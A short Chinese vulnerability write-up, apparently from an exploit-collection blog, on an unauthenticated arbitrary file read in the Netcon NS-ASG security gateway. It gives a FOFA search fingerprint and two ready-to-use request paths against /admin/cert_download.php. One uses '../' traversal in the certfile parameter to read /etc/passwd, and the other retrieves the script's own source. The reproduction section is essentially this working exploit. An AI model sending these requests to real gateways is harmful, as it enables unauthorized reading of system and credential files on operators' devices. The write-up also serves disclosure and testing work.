网康_NS-ASG安全网关_任意文件读取漏洞

# 网康 NS-ASG安全网关 任意文件读取漏洞

## 漏洞描述

网康 NS-ASG安全网关 cert_download.php 文件存在任意文件读取漏洞

## 漏洞影响

> 网康 NS-ASG安全网关

## FOFA

> 网康 NS-ASG安全网关

## 漏洞复现

出现漏洞的文件为 **/admin/cert_download.php**

“`php

“`

此文件没有对身份进行校验即可下载任意文件

“`
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
“`

![](/static/qingy/网康_NS-ASG安全网关_任意文件读取漏洞/img/qax-1.png)

“`
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php
“`

![](/static/qingy/网康_NS-ASG安全网关_任意文件读取漏洞/img/qax-2.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容